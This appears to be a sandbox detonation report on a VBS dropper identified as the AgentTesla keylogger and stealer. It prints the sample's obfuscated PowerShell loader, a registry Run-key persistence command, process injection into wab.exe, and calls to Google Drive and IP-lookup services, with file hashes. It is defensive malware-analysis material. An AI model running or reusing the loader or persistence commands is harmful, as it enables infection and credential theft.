'Selvmde$PigmentgSpi.dvalClimatooDefinitbSerrul.aGisnedelSono.an:SnusdaaA elieffmRavn kriOctroyatPaakrveapensionbFrostinh StttevaScoundr Eluvium= Daaru MedidiiGCivilwoefatssnat .orsto-Las.oenCWhiteeyoTelegranOlsharptParaphyeoutla,dn Smrgaatornit o Octago$InsinceHG,aasteuFlykaprsClairseeret,ingjElevatoeMantlinrBargema ');Sittas (Solidariske ' al,mos$lakf,brgDanserulCeraunooCenternbAngstroa san bll Taxame:Kinsen.Dl,geriteMultimolCon.enitUfravigoG,ycemiiPlasmoldEntosthe OpposeiBos ter1Overbef7Deterio1Temporo Klippee=Bundvan ddleda[ Rotte.S UautoryuniverssArve,latHdersmne J.rdndmSamfun .e,hegneCBronkosoBi ragsnAdipictvrh,zomoe Rotte rSbeurtetIndstte]Koers e:E,somhe: ,ntralF.usicolrSyncom o wi.nowmSubordiBColone.a Komedis aggregeTrves.r6 Kod.ci4 A,bumeSpalaeottHjemf.rrScoinsoi ugrsbonAntikvagpronymp(Ulovlig$ udarbeAUnsecurmtilkrseiBrom,prtLiripipaCounterbSyltninhOverstaaSkyggem) Alpini ');Sittas (Solidariske ' ainfu$ PockytgBoetstilRepudiao BellicbUn.emonaE ologil Ud.app:Hy,notiS NotemuaForskrkd.omputedMngderpuKwa zadk mrkatseOr,tresr Stedsse NeuropsBremse, B.ghand=U,placi ,remme[Sukke fSKaliphuyF.rsvarsSortsynt UdspejeSubartimcytolog.InsuffiTAntrit,e dpresnxExploretOmelett. visemaEUnd rstnFrimrkecSubstrsoManiabldProportiTrombocnDopingdg Pe ige]Argumen:Lyseslu: MetcalATandbylS erpenCPrognosIKippediIRavnsor.ExtradiGSpondyleT,olddotSuomivaSOr.entetGlaz ngrLuciferiGrassednLsegrupgUnrepro(Blndeaa$VkkerglDG.lleaseg,effotl Sunnitt Stopplofo.mateiKulturkd springeB.lysnii adeno.1Attaknx7 Chromo1 Keywor)Hobbyis ');Sittas (Solidariske 'Doorbra$Unre.rogIntimeslAandrigoFaktotubFrondesa E.tomel Superm: lakfjedKlavreieStyresybRapsma a ,ertugtPro.esss Ke.misk TranspuBoss.eteTollgatsNaboberpStrmkreiSmoothllsympatil Dik.afechoristnTrangf,eJicaques Skrter= ektifi$BorgerpSSpratteaIneffecd ExtraddKvasteru Gtzrenk Immun,eDa.nemornon.ucteUnderbesRynketf. 
Ribliks kinemauDemontfbSisyphesUdenbomtSemiquarAgrogeoiDo,mefanFlash.fgKravles(Vaticdi$Ukor ekF Stv,olrAntikkey Arbejds.bmandseFl.tellp Im.lauu fsvalenSekstenkSubsysttRim.nsasGrussefsEndepunnTricenak SelefanKlanhvdiCentrifnTubuleug.aandpae Py,itir PeenedsUnsuper,Catena $ allouBNonfuseeConstrasSk,tteeyForkbsrn SeiningDeneb.le,drtsfonFrimrkedBody.uaeKaloriu) Delega ');Sittas $debatskuespillenes;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
GB 142.250.187.238:443 drive.google.com tcp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt

MD5 5c220ed75280c181214fd09e1eed5be5
SHA1 8632a068505754d734915e2cdb4b23fca1324e3b
SHA256 2c372644fac0b493dc938395727bcb7a2913955dbacbf50b577114ca63e73088
SHA512 5422ee3ea40a6d1d9bd3617bc42fc6dbd9589f57e04bb72fa5518df5e64232ccc20ccb0a03b233770537feaffab1070491efd01c42f54f60a63b14da57e1c69a

memory/916-346-0x000007FEF5CFE000-0x000007FEF5CFF000-memory.dmp

memory/916-349-0x0000000001E10000-0x0000000001E18000-memory.dmp

memory/916-348-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

memory/916-347-0x000000001B560000-0x000000001B842000-memory.dmp

memory/916-350-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

memory/916-352-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

memory/916-351-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

memory/916-353-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YZGRX9C61X669HDJJLQ6.temp

MD5 2d98cb939b6fccc0c0b74478f518ba8d
SHA1 11902caa2dcc93e39cb0d8e3a059426ac2ff2962
SHA256 78edc4b662409c595c12f41e08fd6eafc4a1a1fd822e3bb9f161e1c9f8ce7a7d
SHA512 962538a76666473f0586740dcb2a8369ad5d810da161f7a15969e189e67dafbbe53c5eda80114301e3b174f781cd3de852d50fa3a76e9e609faad4f5a7d65f52

C:\Users\Admin\AppData\Roaming\Restauratrens.Alb

MD5 c990e3d829b26e351547c77df1bc5953
SHA1 df0592b47bea01cc3199012205c3bf55545fb09e
SHA256 f2108dfabed7091171e5c3219a76a955ae6b4d4632d685ead292f346ecf99822
SHA512 f1f78838d6aae755d74f5dcb21b3d5b8f9100937caae28e0c7fdf6dcc39e382bc02e7040bdc4b682ac7148c987bb59f86aa3c36fa769dd85b40a0543361789da

memory/1700-359-0x0000000006830000-0x0000000009F8A000-memory.dmp

memory/916-360-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

memory/916-361-0x000007FEF5CFE000-0x000007FEF5CFF000-memory.dmp

memory/2784-382-0x0000000000220000-0x0000000001282000-memory.dmp

memory/916-383-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

memory/2784-384-0x0000000000220000-0x0000000000262000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-19 14:56

Reported

2024-06-19 14:59

Platform

win10v2004-20240226-en

Max time kernel

148s

Max time network

151s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Delngler = "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\\litteratursociologi\\').Hirstie;%Grusvejene% ($erasement)" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DtcHF = "C:\\Users\\Admin\\AppData\\Roaming\\DtcHF\\DtcHF.exe" | C:\Program Files (x86)\windows mail\wab.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ip-api.com | N/A | N/A
N/A | api.ipify.org | N/A | N/A
N/A | api.ipify.org | N/A | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 4232 set thread context of 3412 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3452 wrote to memory of 1284 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3452 wrote to memory of 1284 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1284 wrote to memory of 3420 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 3420 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 4232 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1284 wrote to memory of 4232 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1284 wrote to memory of 4232 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4232 wrote to memory of 632 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4232 wrote to memory of 632 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4232 wrote to memory of 632 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4232 wrote to memory of 3412 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4232 wrote to memory of 3412 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4232 wrote to memory of 3412 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4232 wrote to memory of 3412 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4232 wrote to memory of 3412 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3412 wrote to memory of 3312 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3412 wrote to memory of 3312 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3412 wrote to memory of 3312 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3312 wrote to memory of 1704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3312 wrote to memory of 1704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3312 wrote to memory of 1704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5240 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"

Network

Country Destination Domain Proto
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 159.113.53.23.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
GB 142.250.187.234:443 tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
GB 142.250.187.238:443 drive.google.com tcp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:443 api.ipify.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 205.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt

MD5 4b9bc21c7f74f2fd1c8ef11ea8c09490
SHA1 296a36eb7687b0436228329baa38f0256f13cd4d
SHA256 254427b2bba5cc34f90ad8877a55e16062511b746870497c596a215d2e3eb949
SHA512 ed794cc51a27af7a6e571f68b854f1ac004c16c943939863e7a51e3dae449425f45d78445bfd24710823481ce4acfc61c92d639a4b14da52f67d1f41455f464a

C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt

MD5 712c85f7347b1b9f2288a220c96b841e
SHA1 790e35b7d500cea6961c44011d958a2013768378
SHA256 70187e88c8446bdaa3eb7ea3bfc0db33c1f2e9641b5db95d0fa22dad724eb981
SHA512 1881a8c4156b12745c414736b68b21df4113dbf9c2744b04d6bbfe7dbc7f7336293b5cdc8008eafb59afa4314affec831d83d6d3b34d3e36b25d831e40cdd972

C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt

MD5 62848a3b8e3b67b5b36a517ad40a402a
SHA1 31db8d0589625d582c55a87c7877fcaa8c1b19ff
SHA256 e070df27506a03e268388353f1de976f4e7c9c5ab152a48d8dc80f87c78ddd4e
SHA512 912cc731a569a3ee5c0f8c1f902c76f358e8366385f24d9bb59f8fffc530c408f7429c67dc3dab05b280f1903a8cc9fec6c927cd7c5daa3b27a1beb4a278a6ac

C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt

MD5 23da8c3612b391292f5cdc51f7bcb018
SHA1 eb345ba5705c1e629c8c44198b812619229693d3
SHA256 6cbc26e82f2a553f9828216b6851b859f57f05df2350666818965cd1e0064a28
SHA512 612c76f6045e861bbe0554ac69a57357bcfd68dbab0954e78db1009d5a71e551704880847f146dc43f934d4a8ce9d5e9b4b163a8acdb5401f44a2ef65ee790e7

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bjnrm1zd.2rs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\Restauratrens.Alb

MD5 c990e3d829b26e351547c77df1bc5953
SHA1 df0592b47bea01cc3199012205c3bf55545fb09e
SHA256 f2108dfabed7091171e5c3219a76a955ae6b4d4632d685ead292f346ecf99822
SHA512 f1f78838d6aae755d74f5dcb21b3d5b8f9100937caae28e0c7fdf6dcc39e382bc02e7040bdc4b682ac7148c987bb59f86aa3c36fa769dd85b40a0543361789da
